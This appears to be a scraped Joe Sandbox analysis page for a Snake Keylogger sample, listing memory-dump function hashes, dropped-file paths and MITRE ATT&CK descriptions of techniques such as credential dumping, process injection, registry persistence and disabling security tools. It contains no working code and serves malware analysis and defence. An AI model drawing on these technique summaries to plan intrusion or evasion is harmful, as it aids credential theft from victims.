Opcode Fuzzy Hash: 046b543814564cad8c6d5a7d8b418d48513a2feed0475cdb234b9c430fc60c68
Instruction Fuzzy Hash: 70A1BF30B00214CFC708BF78E89966DBBF2FB88601F548569E486D7394DB799C46CB92

Function 09F3D37D Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365137697728a4928c6fd5badb1fe76375747e988a04571d33e8d566bb5c3c6a
Instruction ID: 787422837b42dd3e6a0bd60b902200c5e694b2b0ced1dcbcb6d11296dacecfc7
Opcode Fuzzy Hash: 365137697728a4928c6fd5badb1fe76375747e988a04571d33e8d566bb5c3c6a
Instruction Fuzzy Hash: 7351CF71B042158FC704FFB9D88566EBBFAAB88605F448569D489E3384DE38AC06C793

Function 09F3CC49 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24780a9e9ad1b1a8815c1060486fb88792342365f14659b5f20670fe8131ad67
Instruction ID: c2e99397a8517edf6ec229a79900644c147ea05dc52dc2cc9e6b264d4b0b6bce
Opcode Fuzzy Hash: 24780a9e9ad1b1a8815c1060486fb88792342365f14659b5f20670fe8131ad67
Instruction Fuzzy Hash: 9841E7306093818FC306AB75D854519BFF2EF82500F45899AE4D9DB292DE389C59C797

Function 09F3D281 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2085a23b83ff15242d28585484d18681df3c921e5393e6afd1baa1fa348b3c8f
Instruction ID: d7e441b373cf25d818e71a79f455c9902998923f009bdc0f07d2bdbf64d2e5d2
Opcode Fuzzy Hash: 2085a23b83ff15242d28585484d18681df3c921e5393e6afd1baa1fa348b3c8f
Instruction Fuzzy Hash: 0921AA71B14615CBD304BBBDD88466EB7E5FB88A15F408969E489D3380DE38EC06C793

Function 09F3D290 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d2977bd09381eb964169ce04da18738bfd40ec59297a1f842ba5710e22dea65
Instruction ID: 6a4ec76c9e707032b076411e6e2283a182f0f8627d8d88eeaea7eda9e5f95220
Opcode Fuzzy Hash: 1d2977bd09381eb964169ce04da18738bfd40ec59297a1f842ba5710e22dea65
Instruction Fuzzy Hash: AB117571B10625CBD704BBB9E88562EB7EAFB88A15F408529E48DD3340DE38DC06C793

Function 09F3E460 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05df7be908992285a7517dab8d79a4c2a5bbe6bbb52786dd7d0dba79ed063c3
Instruction ID: 6cd0f4787c91037ad1435e7a6370008ad463854b1c6f293a872a741be505089a
Opcode Fuzzy Hash: b05df7be908992285a7517dab8d79a4c2a5bbe6bbb52786dd7d0dba79ed063c3
Instruction Fuzzy Hash: A2217938E00249DFCB45CFA9D98499DFBF2AF88310F28C59AD558EB365E7349A40CB40

Function 09F3E470 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4847324d19291f99c2a68809549256b229bfeb1e78e4a43d994ea0536804af4d
Instruction ID: d4f0a17ee403d348f5861b043652c6b6f4b95003a899dda77d5db768c034a487
Opcode Fuzzy Hash: 4847324d19291f99c2a68809549256b229bfeb1e78e4a43d994ea0536804af4d
Instruction Fuzzy Hash: A211F678E00209EFDB44DFA9D584A9DFBF6EF8C300F25C5A59519AB354E7349A40CB40

Function 09F3D24E Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8affc1740475770b624722cc2a2a240093949416170d51b7a7026ccc0d5c37a3
Instruction ID: e4817ec48cb2044d0c8ea02f25866269df296a2a0e9937f596cb0f34fdf2815a
Opcode Fuzzy Hash: 8affc1740475770b624722cc2a2a240093949416170d51b7a7026ccc0d5c37a3
Instruction Fuzzy Hash: 9701263490B3885FC702DF7698554ACBF79DE42510384C6C6E452DF1D3DA3C840A8B96

Function 09F392F0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 775812b7d9721677ae9e5dead05bd6070a5afc62bc64dca389c09d549b2f36fc
Instruction ID: 24e5e1ce4780af90cbdae651c2070fbd4364f52d36917a4a7de05e4c1acdd5f4
Opcode Fuzzy Hash: 775812b7d9721677ae9e5dead05bd6070a5afc62bc64dca389c09d549b2f36fc
Instruction Fuzzy Hash: 8DF030B0295704CFD71D6F30A80C8543B7DEB11341380A0AAE582C61E4CBBBD481C722

Function 09F392BB Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b07280d15ec6cc749baccdd203401704ce228c1189acefd703b744763b12019
Instruction ID: dd1a0f7e913fa041f75606ed89503e0f9aa84802cfaebb31a68bfce63fa760ac
Opcode Fuzzy Hash: 8b07280d15ec6cc749baccdd203401704ce228c1189acefd703b744763b12019
Instruction Fuzzy Hash: 52E0927119A381CFD3062B3198180953F3ADE22241389A0D7E481C61E7CABE8846C722

Function 09F3BA4A Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 846f771f603d2af9ac115ad3027576e2e661b02a1d3e57c7d8f50dad7a7bb22c
Instruction ID: b33f10e2a97cbd92a3c7c89c182008f4055dea0ab8ededed43b62fc1ab5d8c41
Opcode Fuzzy Hash: 846f771f603d2af9ac115ad3027576e2e661b02a1d3e57c7d8f50dad7a7bb22c
Instruction Fuzzy Hash: FCB01237B05008980900108978410F8F318E1842777008163D31E41001122122300161

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report File.com.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File.com.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xxlooa.exe.log

C:\Users\user\AppData\Roaming\xxlooa.exe

C:\Users\user\AppData\Roaming\xxlooa.exe:Zone.Identifier

\Device\Null

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
File.com.exe

Function 02AAB9B5 Relevance: 23.0, Strings: 18, Instructions: 518
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre